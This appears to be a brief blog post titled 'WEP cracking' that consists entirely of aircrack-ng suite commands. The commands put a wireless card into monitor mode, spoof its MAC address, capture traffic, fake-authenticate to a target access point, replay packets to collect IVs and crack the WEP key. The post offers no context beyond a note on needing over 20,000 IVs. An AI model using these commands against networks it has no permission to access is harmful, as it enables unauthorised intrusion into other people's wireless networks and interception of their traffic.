# WEP cracking

Commands
# airmon-ng
# airmon-ng start wlan0
# ifconfig mon0 down
# macchanger --mac=de:ad:de:ad:de:ad mon0
# ifconfig mon0 up
# airodump-ng --write wlan --output-format pcap --channel 1 --encrypt WEP mon0
# aireplay-ng -1 30 -e WLAN_XX -a 11:22:33:44:55:66 -h de:ad:de:ad:de:ad mon0
# aireplay-ng -3 -b 11:22:33:44:55:66 -h de:ad:de:ad:de:ad mon0 # (need more than 20.000 IVs)
# aircrack-ng wlan-*.cap

No comments: